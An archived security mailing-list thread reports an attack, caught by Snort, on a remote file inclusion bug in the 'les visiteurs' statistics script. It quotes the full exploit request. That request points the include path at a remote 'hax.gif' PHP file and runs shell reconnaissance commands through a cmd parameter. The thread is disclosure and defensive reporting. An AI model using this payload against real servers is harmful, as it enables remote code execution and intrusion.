| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <3FCBD84F.3080605@euskalnet.net> From: gazpa at euskalnet.net (gazpa) Subject: file inclusion (les visiteurs) Hi Lorenzo, First there isn't *their server*. It's other stuff server (c2r.canalforbid.org). Second, they use this server to serve an include file (hax.gif), a php include to *inject* in the buggy 'les visiteurs' (web statistics program) remotely and execute shell commands. And I don't thing they are kiddies, if they wrote 'hax.gif', like it seems. Don't blame people who is only intending to advise people about a bug that is being exploited. Lorenzo Hernandez Garcia-Hierro wrote: >Hi Daniel , >They are kiddies... :( >I was looking the files and there are only high-risk-rated exploits >downloaded from packet storm , ptrace , etc . >And they are running remote php shells in their server.... xD > >See you in the IRC tonight ? > > > >>"Evert Daman" <evert@...ipix.org> wrote: >> >> >> >>>last night snort detected this request: >>> >>>GET /counter/include/new-visitor.inc.php?lvc_include_dir=http://c2r.canalforbid. >>>org/hax.gif?&cmd=cd%20/tmp;uname%20-a;id;cat%20/proc/version;ls >>> >>>because i patched 'les visiteurs' as described by 'matthieu peschaud' >>>on bugtraq on the 26 of october nothing happend, but it looks like someone is trying to exploit this bug. >>>just want to mention it to this wonderfull list :) >>> >>> >>>
Powered by blists - more mailing lists